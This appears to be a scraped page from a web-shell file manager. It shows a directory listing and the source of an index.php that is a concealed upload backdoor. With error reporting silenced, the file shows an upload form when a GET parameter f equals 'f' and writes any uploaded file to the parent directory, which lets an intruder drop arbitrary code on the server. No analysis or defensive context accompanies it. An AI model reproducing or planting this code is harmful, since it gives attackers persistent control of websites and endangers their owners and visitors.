at path:ROOT / thfzwxe / pacyizf / index.php
run:R W Run
DIR
2026-07-05 14:17:12
R W Run
178 By
2026-07-05 14:17:12
R W Run
0 By
2026-07-05 14:17:12
R W Run
324 By
2026-07-05 14:17:12
R W Run
error_log
📄index.php
1<?php error_reporting(0); if(trim($_GET['f']) == 'f'){ $saw1 = $_FILES['file']['tmp_name']; $saw2 = '../'.$_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='upload' /></form>"; if($saw1 && $saw2) move_uploaded_file($saw1, $saw2); } ?>